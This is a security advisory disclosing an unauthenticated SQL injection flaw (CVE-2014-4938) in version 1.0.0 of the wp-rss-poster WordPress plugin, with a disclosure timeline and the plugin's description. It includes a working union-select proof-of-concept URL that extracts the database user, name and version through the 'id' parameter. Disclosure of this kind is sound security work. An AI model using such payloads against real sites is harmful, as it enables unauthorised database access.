wp-plugin : wp-rss-poster

Plugin Details
Plugin Name: wp-plugin : wp-rss-poster
Effected Version : 1.0.0 (and most probably lower version's if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

Here the parameter “id” is susceptible. The root cause is the usage of client input $_GET[‘id’] directly in the plugin.

Disclosure Timeline
Vendor Contacted : 2013-12-23
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4938
Plugin Description :
[| **Main Features:** 1. Easy to create post from multiple rss sources. 2. Specify post categories, author, publish date. 3. Customize formats using flexible post templates. 4. Unix cron and WP internal cron jobs for feed update. 5. Cache images on the WordPress Media Library. 6. Twitter and facebook support. **More info:** * Find out more great [WordPress plugins](http://plugins.wp-coder.net/) ]